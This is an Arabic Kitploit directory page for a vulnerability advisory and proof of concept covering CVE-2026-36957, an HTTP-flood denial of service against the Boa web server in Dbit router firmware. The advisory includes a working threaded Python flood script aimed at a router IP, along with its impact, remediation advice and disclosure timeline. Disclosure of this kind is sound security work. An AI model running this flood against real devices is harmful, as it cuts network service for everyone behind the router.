Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-36957 — إثبات المفهوم لـ CVE-2026-36957، وهي ثغرة حرمان من الخدمة في البرنامج الثابت لموجّه Dbit عبر فيضان HTTP على خادم الويب Boa، مما يسبب استنزاف الموارد وتعليق النظام. | Kitploit
أدوات/GitHubGitHub/kirubel-cve/cve-2026-36957
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراق
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

إثبات المفهوم لـ CVE-2026-36957، وهي ثغرة حرمان من الخدمة في البرنامج الثابت لموجّه Dbit عبر فيضان HTTP على خادم الويب Boa، مما يسبب استنزاف الموارد وتعليق النظام.

عرض المستودع
4منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-36957: رفض الخدمة عبر فيضان HTTP على خادم الويب Boa

معرف CVE: CVE-2026-36957 التاريخ: 2026-04-29 المكتشف: Kirubel Solomne البائع: شركة Shenzhen Dibit Network Equipment Co., Ltd. المنتج: راوتر Dbit إصدار البرنامج الثابت: V1.0.0 CWE: CWE-400 - استهلاك غير متحكم فيه للموارد


الوصف

البرنامج الثابت V1.0.0 لراوتر Dbit عرضة لرفض الخدمة عبر معالج URI لخادم الويب Boa. من خلال إرسال فيضان عالي الحجم من طلبات HTTP GET إلى URIs غير موجودة، يمكن للمهاجم استنزاف موارد النظام الحرجة بما في ذلك واصفات الملفات ومخازن الذاكرة المؤقتة. يؤدي هذا إلى توقف النواة أو تعليق النظام يعطل بوابة الإدارة عبر الويب وجميع قدرات التوجيه.


درجة CVSS

درجة CVSS v3.1: 7.5 (عالية) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

المقياسالقيمة
ناقل الهجومالشبكة
تعقيد الهجوممنخفض
الامتيازات المطلوبةلا شيء
تفاعل المستخدملا شيء
تأثير السريةلا شيء
تأثير التكامللا شيء
تأثير التوافرعالي

إثبات المفهوم

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

السلوك المتوقع: يجب أن يحد الخادم من الاتصالات ويبقى مستقرًا. السلوك الفعلي: تصبح واجهة الويب للراوتر غير مستجيبة؛ ويتطلب إعادة تشغيل يدوية.


التأثير

  • فقدان كامل لواجهة الإدارة عبر الويب
  • تعطيل جميع قدرات التوجيه
  • يتطلب إعادة تشغيل يدوية لاستعادة الخدمة
  • توقف الشبكة لجميع الأجهزة المتصلة

المعالجة

  • تنفيذ تحديد معدل الاتصالات على خادم الويب Boa
  • إضافة مؤقت مراقبة للتعافي من حالات التوقف
  • تحديد الحد الأقصى للاتصالات المتزامنة لكل عنوان IP

الجدول الزمني للإفصاح

التاريخالحدث
2026-04-29اكتشاف الثغرة
2026-04-29الإبلاغ إلى MITRE
2026-04-29تعيين CVE-2026-36957
2026-04-29الإفصاح العام

المراجع

  • MITRE CVE-2026-36957
  • CWE-400
  • موقع البائع
تنزيل الأداة